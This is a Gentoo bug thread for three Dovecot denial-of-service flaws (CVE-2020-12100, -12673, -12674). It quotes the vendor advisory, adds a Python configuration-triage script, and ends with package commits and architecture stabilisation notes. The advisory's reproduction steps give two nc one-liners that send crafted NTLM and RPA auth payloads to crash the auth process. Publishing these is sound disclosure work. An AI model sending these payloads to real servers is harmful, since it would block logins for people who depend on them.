Incoming details.
Open-Xchange Security Advisory 2020-08-12

Affected product: Dovecot IMAP server
Internal reference: DOP-1849 (Bug ID)
Vulnerability type: Uncontrolled recursion (CWE-674)
Vulnerable version: 2.0
Vulnerable component: submission, lmtp, lda
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-04-23
CVE reference: CVE-2020-12100
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability Details:
Receiving mail with deeply nested MIME parts leads to resource exhaustion as Dovecot attempts to parse it.

Risk:
Malicious actor can cause denial of service to mail delivery by repeatedly sending mails with bad content.

Workaround:
Limit MIME structures in MTA.

Solution:
Upgrade to fixed version.

Affected product: Dovecot IMAP server
Internal reference: DOP-1870 (Bug ID)
Vulnerability type: CWE-789 (Uncontrolled Memory Allocation)
Vulnerable version: 2.2
Vulnerable component: auth
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-05-03
CVE reference: CVE-2020-12673
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability Details:
Dovecot's NTLM implementation does not correctly check message buffer size, which leads to reading past allocation which can lead to crash.

Risk:
An adversary can use this vulnerability to crash dovecot auth process repeatedly, preventing login.

Steps to reproduce:
(echo 'AUTH NTLM'; echo -ne 'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' | \
base64 -w0 ;echo ;echo -ne 'NTLMSSP\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AA\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00orange\x00'| \
base64 -w0;echo ; echo QUIT) | nc 127.0.0.1 110

Workaround:
Disable NTLM authentication.

Solution:
Upgrade to fixed version.

Affected product: Dovecot IMAP server
Internal reference: DOP-1869 (Bug ID)
Vulnerability type: CWE-126 (Buffer over-read)
Vulnerable version: 2.2
Vulnerable component: auth
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-05-03
Researcher credit: Orange from DEVCORE team
CVE reference: CVE-2020-12674
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability Details:
Dovecot's RPA mechanism implementation accepts zero-length message, which leads to assert-crash later on.

Risk:
An adversary can use this vulnerability to crash dovecot auth process repeatedly, preventing login.

Steps to reproduce:
(echo 'AUTH RPA'; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01' | base64 -w 0; echo ; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A@A\x00' | base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110

Workaround:
Disable RPA authentication.

Solution:
Upgrade to fixed version.
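
Added example (not part of the advisory or of the Dovecot or Gentoo code): a triage check that reads configuration text and reports which of the three CVEs above still apply, using the fixed version and workarounds the advisory gives. The sample input is constructed and its `doveconf -n` style layout is an assumption; any version below 2.3.11.3, or an unknown version, is treated as unfixed.

```python
import re

FIXED = (2, 3, 11, 3)  # fixed version named in the advisory
MECH_CVES = {"ntlm": "CVE-2020-12673", "rpa": "CVE-2020-12674"}
MIME_PROTOCOLS = {"lmtp", "submission"}  # network components listed for CVE-2020-12100

# Constructed sample, laid out like `doveconf -n` output (assumed format).
SAMPLE = """\
# 2.3.10.1 (0000000): /etc/dovecot/dovecot.conf
auth_mechanisms = plain login ntlm rpa
protocols = imap pop3 lmtp
"""

def parse_version(text):
    """Version tuple from the leading '# x.y.z' comment, or None if absent."""
    m = re.search(r"^#\s*(\d+(?:\.\d+)+)", text, re.MULTILINE)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def setting(text, key):
    """Lower-cased words of the last 'key = value' line, or [] if unset."""
    words = []
    for line in text.splitlines():
        name, sep, rest = line.partition("=")
        if sep and name.strip() == key:
            words = rest.lower().split()
    return words

def audit(text):
    """Return (cve, action) pairs that still apply to this configuration."""
    version = parse_version(text)
    if version is not None and version >= FIXED:
        return []  # already at or past the fixed release
    findings = []
    for mech in setting(text, "auth_mechanisms"):
        if mech in MECH_CVES:
            action = f"remove '{mech}' from auth_mechanisms or upgrade"
            findings.append((MECH_CVES[mech], action))
    # lda is a delivery binary, not a protocol, so it is not visible here.
    if MIME_PROTOCOLS & set(setting(text, "protocols")):
        findings.append(("CVE-2020-12100", "limit MIME nesting in the MTA or upgrade"))
    return findings

if __name__ == "__main__":
    for cve, action in audit(SAMPLE):
        print(f"{cve}: {action}")
```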
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=4cffab4e4790734f6acdd76ca5d9112eb13ac019

commit 4cffab4e4790734f6acdd76ca5d9112eb13ac019
Author:     Eray Aslan <eras@gentoo.org>
AuthorDate: 2020-08-14 09:16:48 +0000
Commit:     Eray Aslan <eras@gentoo.org>
CommitDate: 2020-08-14 09:16:48 +0000

    net-mail/dovecot: security bump to 2.3.11.3

    Bug: https://bugs.gentoo.org/736617
    Package-Manager: Portage-3.0.2, Repoman-2.3.23
    Signed-off-by: Eray Aslan <eras@gentoo.org>

 net-mail/dovecot/Manifest                |   2 +
 net-mail/dovecot/dovecot-2.3.11.3.ebuild | 288 +++++++++++++++++++++++++++++++
 2 files changed, 290 insertions(+)
Arches, please test and mark stable
=net-mail/dovecot-2.3.11.3
Target Keywords = ~alpha amd64 arm ~hppa ~ia64 ~mips ppc ppc64 s390 ~sparc x86
amd64 done
ppc64 done
x86 stable
New GLSA request filed.
This issue was resolved and addressed in GLSA 202009-02 at https://security.gentoo.org/glsa/202009-02 by GLSA coordinator Thomas Deutschmann (whissi).
Re-opening for remaining architectures.
-r1 stabled for arm (with USE=unwind, all but dodgy backtrace tests pass).
ppc stable
s390 done

all arches done
Please cleanup.
Resetting sanity check; keywords are not fully specified and arches are not CC-ed.
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=dfc1038d3efd30e4ecab68e957e68a84606175c7

commit dfc1038d3efd30e4ecab68e957e68a84606175c7
Author:     Eray Aslan <eras@gentoo.org>
AuthorDate: 2020-12-21 14:20:28 +0000
Commit:     Eray Aslan <eras@gentoo.org>
CommitDate: 2020-12-21 14:20:28 +0000

    net-mail/dovecot: partial security cleanup

    Bug: https://bugs.gentoo.org/736617
    Package-Manager: Portage-3.0.12, Repoman-3.0.2
    Signed-off-by: Eray Aslan <eras@gentoo.org>

 net-mail/dovecot/Manifest                |   4 -
 net-mail/dovecot/dovecot-2.3.10.1.ebuild | 288 ------------------------------
 net-mail/dovecot/dovecot-2.3.7.2.ebuild  | 291 -------------------------------
 3 files changed, 583 deletions(-)
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=c9c810739029ebce491020ab8d319b7330aa168e

commit c9c810739029ebce491020ab8d319b7330aa168e
Author:     Eray Aslan <eras@gentoo.org>
AuthorDate: 2020-12-21 14:29:38 +0000
Commit:     Eray Aslan <eras@gentoo.org>
CommitDate: 2020-12-21 14:35:58 +0000

    package.mask: mask vulnerable dovecot version

    masked instead of removing until
    mail-filter/dovecot_deleted_to_trash is treecleaned
    to prevent tree breakage (bugs #756217)

    Bug: https://bugs.gentoo.org/736617
    Signed-off-by: Eray Aslan <eras@gentoo.org>

 profiles/package.mask | 6 ++++++
 1 file changed, 6 insertions(+)
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=340756b94cf702eeb0aa29f3ecef649cf226bb80

commit 340756b94cf702eeb0aa29f3ecef649cf226bb80
Author:     Eray Aslan <eras@gentoo.org>
AuthorDate: 2021-01-21 08:35:23 +0000
Commit:     Eray Aslan <eras@gentoo.org>
CommitDate: 2021-01-21 08:36:58 +0000

    net-mail/dovecot: remove vulnerable version. cleanup done

    Bug: https://bugs.gentoo.org/736617
    Package-Manager: Portage-3.0.14, Repoman-3.0.2
    Signed-off-by: Eray Aslan <eras@gentoo.org>

 net-mail/dovecot/Manifest                          |   2 -
 net-mail/dovecot/dovecot-2.2.36.4.ebuild           | 287 ---------------------
 .../dovecot/files/dovecot-userdb-passwd-fix.patch  |  18 --
 3 files changed, 307 deletions(-)
All done!